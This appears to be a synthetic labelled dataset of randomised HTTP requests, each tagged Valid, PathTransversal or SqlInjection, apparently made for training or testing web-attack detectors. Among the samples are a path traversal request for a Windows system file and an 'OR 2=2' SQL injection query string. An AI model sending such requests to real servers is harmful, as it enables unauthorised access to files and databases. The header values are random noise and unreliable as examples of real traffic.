TE: trailers,trailers,trailers
Trailer: TE
User-Agent: utrpe/0.4.2.4
UA-CPU: PowerPC
UA-Disp: 743,4010,8
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 3397x406
Via: 0.4 108.156.119.76:2, 2.3 www.astweaev.tiff:93365, 5.7 96.227.72.114
Transfer-Encoding: compress
Upgrade: rIu/4.2, Etk/6.8
Warning: 638 32.100.231.190 "ronreot0rsachetajte" 
X-Forwarded-For: 207.213.57.172
X-Serial-Number: 178382284
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

re6T9eln0intg=19190&8_mphpunionHxYe8autoexec9=1847&dhlm2ree6leoal=einnon1iarwsltgb&oaiwealloeg63=7uEl&+tfeconnecthupdate&hsn1f=42226722&jVuuj=924&0ijuric=htaq6csac8eel

End - Id: 34623
Start - Id: 17890
class: Valid
GET /iBloqrayxCWzPEcbk/o8a/tvezlMgNWR/eqmpDLp8UD8X6ObtKQ/e7XArd6nWwV1TsEvdzg/8voKH8/n-HJRpn/iitwiIepd/yhznDUKj4qS8Bb7O/ty3.swf? HTTP/1.1
Host: 188.56.133.185:6
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=7
Client-ip: 235.44.149.89
Cookie: netsztoa=eacgosYpd2se;aodzc4icnto=i;nseneEnspa=ncsoimTs;kun5NndAt3a=23562559
Cookie2: $Version="5"
Date: Sat, 25 Mar 06 08:17:33 CET
ETag: "bLNGsv_WFsHfUWx1.kz_"
Expect: 100-continue
From: rdny@hctpuostk.cz
If-Modified-Since: Sun, 05 Mar 06 21:17:12 GMT
If-Unmodified-Since: Sun, 25 Mar 07 08:29:23 GMT
If-Match: *
If-None-Match: *
If-Range: "ZurzCTx-0i@Bgg-"
Max-Forwards: 391
MIME-Version: 3.8
Pragma: ceidtf='adx'
Proxy-Authorization: Digest realm
Authorization: Aerf wexZot=okwho6ts
Range: -87,9893-
Referer: http://www.eoea7.com/eees9opd/tdzit/mteoen/emldno.msf
TE: trailers,trailers
Trailer: Range
User-Agent: Mozilla/4.2 (Windows; U; WinNT 8.7; tj-ba; rv:5.8.6) Gecko/95556955
UA-CPU: Sparc
UA-Disp: 929,7380,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 523x1389
Via: 7.5 130.20.56.53
Transfer-Encoding: identity
Upgrade: Rhati/3.5, utw/4.6, 9reuu/0.0
Warning: 737 27.95.14.86 "Soaoayayt4nrwenZO" 
X-Forwarded-For: 188.200.228.132
X-Serial-Number: 3494344
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17890
Start - Id: 8458
class: Valid
GET /dw6gae8dn/7L/zbinyo7lUtmpDjAd.p/hv53A/our/ty/stdinG7rA2HNOaBA/doepE/ei5/e5ZVOLTub8Tv/u8rosrniltnsx5trgnr7.jpeg? HTTP/1.0
Host: www.tnmabS4.de
Connection: close
Accept: image/*, video/*, video/*;q=0.6
Accept-Charset: *
Accept-Encoding: identity;q=0.2, gzip, gzip, identity, deflate
Accept-Language: hIdzrH-uet, vv6rthtc-se;q=0.8, ato-tsshr, ydRz5-eehl, 2ycc6-lnhnhoan;q=0.3
Cache-Control: no-cache
Client-ip: 235.188.204.49
Cookie: hhtiyab=sKDrO9tiC;lpgeeiNGeteehto=d6rKj;0aWBWVMKkYcd4=tu6
Cookie2: $Version="52"
Date: Sat, 31 Dec 05 12:26:42 UTC
ETag: W/"H_axWP2L8eMuW@t72"
Expect: 100-continue
From: lraeI@n6eai.de
If-Modified-Since: Fri, 25 Jan 08 03:50:08 UTC
If-Unmodified-Since: Tue, 16 Feb 10 09:13:13 CET
If-Match: "aOpsFIEn0t1cyy15pzX"
If-None-Match: *
If-Range: ".qt2_zPOxyoa1_du"
Max-Forwards: 301
MIME-Version: 9.2
Pragma: awvrllt5='tsehd'
Proxy-Authorization: rahe cmte4Hz=rntcz1cz
Authorization: Basic Q3NybzphZWV0
Range: -41709
Referer: http://www.iceeenos.org/eeem/rs9rnne/glhnnl/7heSr/Hsh2.bin
TE: trailers,gzip,gzip;q=0.0
Trailer: If-Unmodified-Since
User-Agent: obIDRIb http://www.erenprpP.fr
UA-CPU: Sparc
UA-Disp: 3788,441,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 3083x039
Via: ow1s/3.9 10.69.144.230, 7.9 217.71.153.75
Transfer-Encoding: gzip
Upgrade: eht/0.1, daroy/6.1, dh2hn/7.4, 6nar/5.6
Warning: 961 www.ntijm.html "estseteardr" "Thu, 20 Mar 08 23:35:03 CET"
X-Forwarded-For: 24.38.239.223
X-Serial-Number: 3858691762
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8458
Start - Id: 21524
class: Valid
GET /Axwaaunthoslaads/guwTTg_0RSPWhHD/vtISX2agDH0d1or.php? HTTP/1.1
Host: www.ve2tkU.uk
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: identity
Accept-Language: Ro-Bslatang;q=0.3, ibamo-rtehel;q=0.0
Cache-Control: no-cache
Client-ip: 190.4.211.183
Cookie: n7Oliiiss=ori<dheli1;mnP2aetna3tcah=72818
Cookie2: $Version="1"
Date: Sun, 08 Oct 06 18:28:28 UTC
ETag: W/"ntfELDStUc0DhxJ4BRh"
Expect: bnur
From: 2T2s@ttdsSsnEe.gov
If-Modified-Since: Sat, 29 Jan 05 09:05:12 GMT
If-Unmodified-Since: Sat, 09 Feb 08 12:29:48 CET
If-Match: *
If-None-Match: "JBvmlbwISQSEwpUCh"
If-Range: "vPI9nbbMlWZdnQF"
Max-Forwards: 988
MIME-Version: 9.7
Pragma: no-cache
Proxy-Authorization: Digest opaque="o4Esftv"
Authorization: Basic bmNidDpsdG5seWhL
Range: -6570,934358-908192
Referer: /Hohn/ufaeMdrz.txt
TE: trailers,gzip;q=0.7,trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/7.2 (compatible; oemoeaEe; Windows NT; urilsnr; ee3m; Msneh67i)
UA-CPU: StrongARM
UA-Disp: 1794,9369,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 5415x3665
Via: 6.9 www.itinrHer.html, HTTP/8.1 120.38.125.137
Transfer-Encoding: identity
Upgrade: itf7t/2.6, csuezD/6.0, raVi/0.2, 5hi6lt/9.3
Warning: 989 95.146.49.238 "goslds92assa6" "Thu, 02 Oct 08 01:14:20 UTC"
X-Forwarded-For: 204.143.131.123
X-Serial-Number: 15490998338905562
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21524
Start - Id: 36207
class: PathTransversal
GET /.nsf/../winnt/win.ini? HTTP/1.0
Host: 177.7.112.116:1597
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: windows-1254, iso-8859-3, x-mac-arabic, windows-1252;q=0.0, big5;q=0.7
Accept-Encoding: gzip, identity;q=0.4, gzip;q=0.4, compress
Accept-Language: *;q=0.3
Cache-Control: no-store
Client-ip: 189.4.113.141
Cookie: 5vnctuyePlsnp=NraTx;Il7lesenS=rwonavr;e5b2fmiwemt=sxt\hSw 'Rnehno~n;nfTrom8ahtD=oflal8hShcxt;5x=3adepiIpl;imhbJetye6i4oE=26403
Cookie2: $Version="3"
Date: Sun, 31 Aug 08 02:58:43 CET
Expect: 100-continue
If-Modified-Since: Fri, 18 Jun 04 21:07:23 UTC
If-Match: "BL6_@8kSIXD9@TvuYy"
If-None-Match: *
If-Range: "8XV@_2tDEk.7skyj.Qd"
Max-Forwards: 92
Pragma: no-cache
Authorization: Basic ZGhvbjpuZHRmcno=
Referer: http://eewtn.be/6ats.dll
TE: trailers,trailers,gzip
Trailer: Accept-Language
User-Agent: Mozilla/2.4 (Machintosh; U; Mac OS X 0.8; st-ao; rv:0.2.9) Gecko/51571638
Via: HTTP/4.7 www.obneerAc.shtml, FTP/3.0 142.96.237.198
Upgrade: sst2oo/6.7, eatt/1.0

null

End - Id: 36207
Start - Id: 6628
class: Valid
POST /hpkih6zRkoiapsHikd/reS7eoephliyelKlenu/9LEnsdtoLaai0eira/cllMamDomt/aecO34osas3/cAja/wjaBMMr.m/00D7ckeoJ5mlike.swf? HTTP/1.0
Content-Length: 39
Content-Language: uhbi
Content-Encoding: gzip
Content-Location: http://aqzh.cz/rYbuFmis.htm
Content-MD5: cnVhSEZOZzhuZGJKenNSYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 11 Nov 08 06:02:45 CET
Last-Modified: Mon, 22 Jan 07 16:13:48 CET
Host: 209.44.27.240:80
Connection: efNdtecT
Accept: video/*;q=0.1
Accept-Charset: euc-jp
Accept-Encoding: compress;q=0.8
Accept-Language: lDhe-o, estnyTe-ati;q=0.6, nubstna-teitonn;q=0.3, auboqtkl-ef3rnns;q=0.3, egg-nanbe5;q=0.0
Cache-Control: max-age=5
Client-ip: 54.197.158.136
Cookie: mTrobxItanouhii=s%ue;cmleiattNmrphd=0bHhoyqreoatlMiuc;gcrnpr6eapni=999107485;a3Ft91sc0KEmz=00588366
Cookie2: $Version="818"
Date: Mon, 04 Apr 05 03:24:42 CET
ETag: "nzhBdCdf6ErvF0kxvx_"
Expect: 100-continue
From: opcra@uqeH.it
If-Modified-Since: Thu, 20 Sep 07 10:51:43 GMT
If-Unmodified-Since: Mon, 03 Jul 06 08:01:21 GMT
If-Match: *
If-None-Match: *
If-Range: Mon, 27 Feb 06 04:12:12 UTC
Max-Forwards: 3066
MIME-Version: 9.2
Pragma: no-cache
Proxy-Authorization: NTLM cnp1Z3NpYXNmYlVvZWhvZWN0am5zYnZyckR0ZVpod2x0dHM=
Authorization: Digest cnonce="oPewrEEa"
Range: 9-
Referer: /HhhTb/1ilds.swf
TE: trailers,chunked;q=0.3
Trailer: Pragma
User-Agent: aLlft/9.4.6
UA-CPU: MIPS
UA-Disp: 7646,961,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 7771x7068
Via: 4.9 www.eRnsEdw.shtml
Transfer-Encoding: identity
Upgrade: thsp8p/2.1, eptIic/7.2
Warning: 729 228.123.175.18:441 "a6o1oy" "Wed, 13 Apr 05 04:36:18 UTC"
X-Forwarded-For: 239.4.241.123
X-Serial-Number: 1883916310
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~

qdqSafftmY=?ri\aN&3zr&drialadi=Hl

End - Id: 6628
Start - Id: 22779
class: Valid
GET /yshaa9Rn7e2Hn5Yuphoc/t.AZ.php4?ecmt1Riar=%27&ywmslhnzeq6e=ernk HTTP/1.0
Host: www.9ueonsbf.gov
Connection: ntuO6
Accept: application/x-tar;q=0.9, application/rtf;q=0.1
Accept-Charset: hz-gb-2312;q=0.5, windows-1254, gb2312, x-mac-greek;q=0.2
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=6
Client-ip: 179.239.37.65
Cookie: hsn7ttr1stnnae=e81>;tmpBundDac;8Eit=inpwwh&tn ufocSea;XMZjHXWGl32_=erg;rfdrrwEesv8ac=7188829;pNeIreplace0LfxI=ogCeoisihcd;hpn1Br@LphpzuX=5290899
Cookie2: $Version="0"
Date: Tue, 16 Aug 05 08:00:46 GMT
ETag: "koXigvcjUzSB2K0yR2"
Expect: A3ioh7yr=n5gecol;lmo0aaqh=amaurO
From: labOkeyp@Tmrr6ene.de
If-Modified-Since: Wed, 26 Nov 08 06:24:27 GMT
If-Unmodified-Since: Sun, 08 Feb 04 05:41:32 CET
If-Match: "eU10d3CnSWX63hZSreY_"
If-None-Match: "6ZK4yBtqKO@xDQNdR"
If-Range: Mon, 09 Nov 09 04:16:50 UTC
Max-Forwards: 140
MIME-Version: 7.9
Pragma: t='nt'
Proxy-Authorization: Digest qop=grcer75h
Authorization: Digest nonce
Range: 34-,77353-25473,-559
Referer: http://www.iyquLea.gov/2doen/inhyccc/iteubqpm.css
TE: trailers
Trailer: Trailer
User-Agent: Mozilla/1.0 (Windows; U; WinNT 6.2; le-oe; rv:3.1.9) Gecko/34750908
UA-CPU: 68000
UA-Disp: 9973,4219,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 396x8159
Via: 0.9 www.exoT.css
Transfer-Encoding: deflate
Upgrade: zuf/1.3, ons/6.0, ctn/4.8
Warning: 509 1.194.23.83 "adqi2nt" "Thu, 27 Apr 06 20:53:34 GMT"
X-Forwarded-For: 147.118.27.36
X-Serial-Number: 058187169230158
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22779
Start - Id: 28225
class: Valid
GET /moC5790g4._cG/cl/ORT5EaA/Jc6z/BW0KxHG/fsx.aspx?ebeya0b=qlsa4&ipeyneral=741879&5iBh=Vtpvir+stdinnsadrop+tm8%26&.37N=0963&nteorh5gzcutgoe=tisc&do3ttqte66t=htls8mtastpso&trssHeoauWxi=tyXbNaE3K HTTP/1.0
Host: 162.4.250.62
Connection: keep-alive
Accept: application/*;q=0.3
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 118.186.42.37
Cookie: pn=53925578;eh0Rjp=a0tosystemaips %ehrll[sl
Cookie2: $Version="649"
Date: Wed, 07 Jun 06 12:16:37 UTC
ETag: "m1wD2fPoNIL_1.zv_"
Expect: eSmks
From: 3ssvtcr@sBoeped03N.be
If-Modified-Since: Tue, 28 Apr 09 21:22:45 GMT
If-Unmodified-Since: Wed, 30 Jul 08 12:05:16 CET
If-Match: *
If-None-Match: *
If-Range: "pkURCqbiZC3.rpsY2t"
Max-Forwards: 253
MIME-Version: 0.4
Pragma: e9dnneT=e
Proxy-Authorization: Digest opaque="lesgG"
Authorization: NTLM dHNsZWFuaXBydHptZWExc2FhSW5ybm9laGdlZWRydHpvdGJzYXd0bzFhYWhk
Range: 9-215077,5-
Referer: /ejryadew/aeen/qxrr/heb3.cfm
TE: trailers,trailers,trailers
Trailer: Expect
User-Agent: tnoaernpte/1.9.4.9.0
UA-CPU: MIPS
UA-Disp: 7874,6904,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 3395x113
Via: 2.8 www.yoyLinfh.jpeg, 8.0 www.ve5d7d.tiff
Transfer-Encoding: veuius; ri7lseh8=2jnhipez
Upgrade: uOiar/2.7, NgZ73n/8.2, sDhb/6.3, oeA/4.9
Warning: 875 www.nlpr9.css "nnnwss" 
X-Forwarded-For: 242.176.161.203
X-Serial-Number: 144317661774202
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28225
Start - Id: 8663
class: Valid
GET /mwavrnnhs5SqrineNgy8/3b2fwindow.openCruevalnode0aroselectM/te7rnhGsaenr8ita/2icrber7rr2itH/nLiEuD7I2zz/o2ohsetq.dll?Ceotein1o=rit&enciNtenoreu=2ttao+waccepttdtau&in=ife%3F HTTP/1.1
Host: www.pin0OSe.be:80
Connection: gt7t
Accept: application/postscript;q=0.5
Accept-Charset: *
Accept-Encoding: compress
Accept-Language: toi-2;q=0.0, l-z3ipl, 0inen-aeehj
Cache-Control: min-fresh=0270
Client-ip: 225.249.20.48
Cookie: oegzfi9suwin9ee=6444;iTvs=685692;AotinitEAdSdti=|[ku? xterm;rh8jeethzHnh=hYfnEHjZ3l;1enrm=amdm;tiwra0rqTerdn=0317
Cookie2: $Version="48"
Date: Mon, 04 Oct 04 14:59:53 UTC
ETag: W/"v@BjGHevyt7Oc4t@iuz@"
Expect: huicy=ryees
From: Xsnt@ceTo3y.it
If-Modified-Since: Wed, 26 Aug 09 14:48:25 UTC
If-Unmodified-Since: Fri, 13 May 05 24:04:56 GMT
If-Match: *
If-None-Match: *
If-Range: "7XIttW2oL-ryMqgM-S"
Max-Forwards: 83
MIME-Version: 4.8
Pragma: no-cache
Proxy-Authorization: ns7siw llzif0=ebeiais
Authorization: Basic VnJhRVVJWjo3cHRl
Range: -766,58-986789
Referer: /rdxi2Onh/idELrexe/1or5ritt/5mot.swf
TE: trailers,deflate
Trailer: Referer
User-Agent: oZPStaCd http://www.Nmerr.org
UA-CPU: x86
UA-Disp: 051,717,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 8393x485
Via: 5.6 www.odBvroh.js
Transfer-Encoding: 3cbaim; ytrVtci=6oeme
Upgrade: qfgtt/5.3, dpEcC/8.8, 1deop/0.8
Warning: 888 www.beiaIt.css "S3j3Xr4oawsaaadt" "Mon, 27 Aug 07 01:27:20 GMT"
X-Forwarded-For: 71.14.68.150
X-Serial-Number: 396730650206
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8663
Start - Id: 41695
class: SqlInjection
GET /oNrroerit2/2Oxuzlnlrt/dr/fpx/mkt1afhnGpr/nlKwtah/Iw/8jLjAK_netcatZDj0v/cZ2Na@A@1qAM9h8Ze/_UENP/tesmroe6.asmx?e9love1o5deegeo=eihoctrnbdiu&5qpaaxenhrhs=2998948&mailh2Tud.11He=hl&_U.3=37383579&qh3d8aes=+0pa%2F%3BernoE5sfsam9Sns&zCqBlogtxp_D5=lzcmdge&suidn6drnra=m+pnetcatc&PzS4mqAx@=OR+2%3D2 HTTP/1.0
Host: 139.127.123.71:048
Connection: keep-alive
Accept: image/png, image/*, image/*
Accept-Charset: x-mac-chinesetrad, windows-1252;q=0.0, windows-1258;q=0.5
Accept-Encoding: 
Accept-Language: aj-ehd, ih-soat;q=0.5, onrneswi-ah6o;q=0.1
Cache-Control: no-transform
Client-ip: 173.78.32.144
Cookie: hr=soeuoEyen;edimeTs=vbscriptuO
Cookie2: $Version="3"
Date: Sat, 29 Apr 06 23:41:37 UTC
ETag: "ms1MadMBVHvYr8Op"
Expect: 100-continue
From: ube8gesO@rdptemmi.st
If-Modified-Since: Sun, 09 Jul 06 02:54:29 CET
If-Unmodified-Since: Sun, 25 Apr 10 23:19:21 GMT
If-Match: *
If-None-Match: "V7IgBjY-NVPkVTb5_@mh"
If-Range: "-i@sj7dVHH6DtS2Vy"
Max-Forwards: 0957
MIME-Version: 5.9
Pragma: bulscla='NtliA'
Proxy-Authorization: Digest qop=auth-int
Authorization: Basic QXNlbzBuNVM6ZWVyZWJrdHk=
Range: 271923-
Referer: /at2eWwAc/lnb0yi/nfitr.asp
TE: gzip
Trailer: Authorization
User-Agent: Mozilla/9.1 (Machintosh; U; Mac OS X 6.9; sq-oq; rv:9.1.6) Gecko/56252243
UA-CPU: Sparc
UA-Disp: 1862,8220,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 0003x3071
Via: HTTP/7.0 www.meaeosto.jpg, hho/8.4 www.ssse.htm, FTP/9.8 www.p0iz3.png
Transfer-Encoding: ciwyit
Upgrade: Him/6.1, srtana/5.1, 5si/1.9, fHrl2k/2.1
Warning: 118 2.156.64.121 "naglietszhgs" 
X-Forwarded-For: 200.2.71.249
X-Serial-Number: 611965021882313
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41695
Start - Id: 3239
class: Valid
GET /fnSU_3V8bXnJaIz/ticnn.html?I4amwl=olsBuEstim1inas6k&scripttVggwePoxp=024&e2cieg=9440861&ar8tUar=%5Dew%3C%3E&ullsiweb=renEzHechweatOE&7scir=ru+6redn&n9e=yzctntu HTTP/1.1
Host: www.dCtpte4u9q.gov:2651
Connection: keep-alive
Accept: */*
Accept-Charset: windows-874;q=0.0
Accept-Encoding: *;q=0.5
Accept-Language: rw-s, nGrt-ifeiErR;q=0.9, cobre-ee, oblc-guoset;q=0.8
Cache-Control: max-stale=979
Client-ip: 9.29.40.17
Cookie: oi0er=shE~enwogkd[p;Acaemant=ohxH+mb;sqciokesrfil=e6ipee3esyA;t1pvel=ee?|5t/e-a$ NJimi
Cookie2: $Version="940"
Date: Wed, 01 Mar 06 05:35:40 GMT
ETag: "ApY8eeuPU@ZPUbkv"
Expect: 100-continue
From: enn6@rliEa.it
If-Modified-Since: Fri, 17 Mar 06 10:06:52 GMT
If-Unmodified-Since: Fri, 26 Mar 10 19:46:58 GMT
If-Match: "y1wPWgj3-VeIWq-rsx.c"
If-None-Match: "q.qaXR@jbvGvSx3@2"
If-Range: Mon, 01 Oct 07 22:21:59 UTC
Max-Forwards: 04
MIME-Version: 4.4
Pragma: no-cache
Proxy-Authorization: Basic dGVpaHM6b2lsYWRkYWk=
Authorization: Basic aW93cm0ycTpsc3dv
Range: 7-
Referer: /mtNjrNda/eR9ae/ESni.wav
TE: trailers
Trailer: Authorization
User-Agent: 2B22Ie http://www.eqt3n4.ch
UA-CPU: x86
UA-Disp: 098,469,8
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 796x812
Via: 6.3 46.100.51.42
Transfer-Encoding: compress
Upgrade: Anim/9.2, 4ebtk/6.4
Warning: 925 www.t1tEewa.css "iYe7tpBtm7wyjraztas" 
X-Forwarded-For: 252.218.6.87
X-Serial-Number: 65430
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3239
Start - Id: 30074
class: Valid
GET /iihtEeiSescDe/rwg3bajRTG_K/7QGLIaD/oBUUQtDt@t/AP8gBpURf/lbonUc/tn2/3dtuulmiRmnmztcia0a/adminTjnh4LN/OYkoIxJlikejd5bgsound/tuENhVY.bin?dcnsLgtciiu=dsFytZ&libo9CUPZHerk=loO7ZwXv&caqeo=tfnr&orfOzMp4eenrt=7%24u%3Bnph-xt%3B%7Egda&ynhcteebv=ue6gNttmywn&It5zEwrrqSf=79&hroroorhleors=%26r%29urwindow.opencf8h HTTP/1.1
Host: 69.175.205.222
Connection: t6dv
Accept: */*
Accept-Charset: iso-8859-6;q=0.6, utf-7, utf-8;q=0.2
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-stale
Client-ip: 97.106.108.255
Cookie: szursiilsn=d nh(&hgdnqr 2o;afrsmWLnoCae=18940;t5s0n=19;NstyleO@BeiframeC=sstxpoitasRtlwlIr
Cookie2: $Version="551"
Date: Sun, 07 Sep 08 10:52:55 GMT
ETag: "@LwlkikSMq@CQ6IxWA"
Expect: 100-continue
From: nothg@59ro.ch
If-Modified-Since: Fri, 20 Feb 09 04:39:31 UTC
If-Unmodified-Since: Sun, 05 Jun 05 19:37:47 CET
If-Match: "uG6fl5oLm5GXILgA"
If-None-Match: *
If-Range: "TNFPOn0x-H7p4hNX"
Max-Forwards: 596
MIME-Version: 0.9
Pragma: i8es7F='E'
Proxy-Authorization: hh5ore wukONet=mohs
Authorization: Basic Y21ucnduOjllZWE=
Range: -551
Referer: /n76peS/so1z/amee/rsacosi/ilhe.php
TE: trailers,chunked
Trailer: Referer
User-Agent: ti60sirfnerrae7
UA-CPU: StrongARM
UA-Disp: 794,239,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 335x9769
Via: 3.7 121.244.135.16
Transfer-Encoding: twnh; thnssecw=ratub
Upgrade: wteear/7.0, siaf/7.6, vawdDs/3.7, isedd/5.7, tns/6.0
Warning: 922 172.195.36.87 "f6tmena1" "Fri, 19 Dec 08 22:12:57 CET"
X-Forwarded-For: 255.243.109.163
X-Serial-Number: 442439302674714
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 30074
Start - Id: 34890
class: Valid
POST /ehar/P3Ub/yN.n6S/2vmhDiognea9eniRlaa.aspx? HTTP/1.0
Content-Length: 104
Content-Language: 5o
Content-Encoding: compress
Content-Location: http://inoadl.be/stctase/deoqenah.mspx
Content-MD5: Uk9ldXRlYWl0cXJkYTgzOA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 19 May 08 22:45:12 CET
Last-Modified: Fri, 29 Apr 05 05:49:23 CET
Host: 193.144.148.83
Connection: tivc
Accept: */*;q=0.2
Accept-Charset: windows-874;q=0.6, koi8;q=0.4, iso-8859-6;q=0.4, euc-kr
Accept-Encoding: *
Accept-Language: *
Cache-Control: earyn=oH
Client-ip: 148.13.5.11
Cookie: betweenwherereplaceV=8xml-@t0dr<hshnq ry;odGnA=1631
Cookie2: $Version="8"
Date: Sat, 23 Sep 06 20:55:46 GMT
ETag: "v_aeITxqGo4O3-8k2YwZ"
Expect: 100-continue
From: aioNe@o85EoEesvN.org
If-Modified-Since: Mon, 27 Jul 09 20:01:41 CET
If-Unmodified-Since: Wed, 14 Mar 07 19:44:38 UTC
If-Match: "6U-n7y3@R0hR09wC.DUs"
If-None-Match: "Zj@Hh34l@Us3uhyvGUrU"
If-Range: "e2vk9np6.6EwFJ3i"
Max-Forwards: 2
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: Digest nc=72e2B70C
Authorization: NTLM d2Vob2k2b2VnbmJxcnRhbnNzdGl0dDJpaHRhZWVNdG9lZW9lMDJhOHZ6c3Q=
Range: 092889-
Referer: http://www.ifoeen.org/binih/hd3sx/1tTituj/eiis/onPisr.js
TE: deflate;q=0.6,trailers
Trailer: Trailer
User-Agent: persticol (zOag@rY3q@)
UA-CPU: MIPS
UA-Disp: 6897,377,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 0430x9866
Via: 6.0 www.celmsvnr.html
Transfer-Encoding: compress
Upgrade: minhlz/2.0, gtr/0.2, nusiot/8.5
Warning: 984 www.5sli.jpeg "inisbLIlrtinx" 
X-Forwarded-For: 240.255.196.104
X-Serial-Number: 77838287681504099212
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

asiwiaDtosedneP=ab:linkir&f8SRRdreplaceS=234854&K2xF=748119&5t1dtsccModei=snlnr15sC i&eqo=otsEltNattaa

End - Id: 34890
Start - Id: 15068
class: Valid
GET /Ae.tiff?srwqiyitywtaec=tUiqweeeqnxodumsr&ha=17333067&oieKaWrmedt=98&nI=tE HTTP/1.1
Host: 103.59.58.41:447
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: *
Accept-Encoding: *
Accept-Language: satedrt-RsYmb, n-newt;q=0.9, sya51n-t8egt;q=0.4
Cache-Control: min-fresh=13
Client-ip: 203.246.219.167
Cookie: rt9o=tdiyeaaformelshsahee;eqajanTtnM=ereotTtEte;ihilpasri= g;usa=hevalHeogwindow.openr;7stbzl=5351;7gKAinFKWJ_=ReDi Pn1(hhu[ese6tep
Cookie2: $Version="81"
Date: Tue, 25 Nov 08 06:48:57 GMT
ETag: "zIvWR7@VnEC9E4C"
Expect: 100-continue
From: yoa7I@ropq1e.be
If-Modified-Since: Tue, 20 Feb 07 23:42:28 UTC
If-Unmodified-Since: Mon, 01 Feb 10 13:37:30 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 8667
MIME-Version: 2.9
Pragma: A91=f
Proxy-Authorization: Digest response="a5e6c9C505B71e1cDdCFdCdB3aF006A7"
Authorization: Basic b3dybzhtdGk6dGVlaWJn
Range: -3610,072048-063,-8
Referer: /rpecY/ytin/aw1Sie1n/wu0hsome/eMo8eYe.conf
TE: gzip,deflate
Trailer: Max-Forwards
User-Agent: ttbaD5aemRvQpms8a
UA-CPU: MIPS
UA-Disp: 3763,8529,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 656x086
Via: 8.7 www.sA0h.htm, HTTP/6.1 www.lnaanrbs.jpg, 4.7 www.hMhnti.png:8296
Transfer-Encoding: identity
Upgrade: ueemt/7.4, bah/0.8, rta/2.0, rbaf/1.3, siueo/2.5
Warning: 352 176.101.245.85 "VhmtzhedooeenorYir" "Tue, 05 Apr 05 11:56:04 CET"
X-Forwarded-For: 145.80.124.77
X-Serial-Number: 618402796
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 15068
Start - Id: 26305
class: Valid
GET /yKZfwOI_x/zKtYfIlink/rRfVG3Aa..jsp? HTTP/1.0
Host: 28.187.27.95
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: *;q=0.9
Accept-Encoding: gzip;q=0.6
Accept-Language: 3Sm-roat;q=0.4, 4SstxSn-eenyre
Cache-Control: no-cache
Client-ip: 55.156.173.255
Cookie: gtEHwi5loaS=dbh;tit=602;EeR5hb5=929131
Cookie2: $Version="90"
Date: Mon, 02 May 05 21:13:41 GMT
ETag: W/"E6W2y.qV7uj_5gez2TxL"
Expect: 100-continue
From: teed6sis@nesteei.biz
If-Modified-Since: Sun, 08 Mar 09 23:05:23 CET
If-Unmodified-Since: Fri, 18 Feb 05 19:58:54 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 27 Mar 10 13:33:41 GMT
Max-Forwards: 7
MIME-Version: 7.8
Pragma: lRt='Iow'
Proxy-Authorization: Basic Zmhpc2U6c3RlaWlhbzE=
Authorization: NTLM c2luc3d0aWlhdGVzMncwdGM2dHJwbHBPeWxzZXByZW5haW5hdG9u
Range: 338-840605
Referer: http://htdNr.ch/tiure/co8hx4.swf
TE: trailers
Trailer: Upgrade
User-Agent: 21agliira/4.6.0.8.1
UA-CPU: StrongARM
UA-Disp: 052,216,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 3902x9522
Via: HTTP/3.5 www.esGot3r.tiff, 4.0 www.lnSnehi.jpeg, HTTP/2.8 www.Vrnhi.css
Transfer-Encoding: 9rouio; 0dae7=rHjo
Upgrade: 7tTa/7.8, stro8/9.2, aysmr/9.8
Warning: 505 www.i0e1ateH.gif "k3cpb0eut6nh3" "Fri, 02 Jun 06 13:47:27 CET"
X-Forwarded-For: 212.21.79.197
X-Serial-Number: 8772849575
----: ----------
~~~~~: ~~~~~~~~~~~

null

End - Id: 26305
Start - Id: 48328
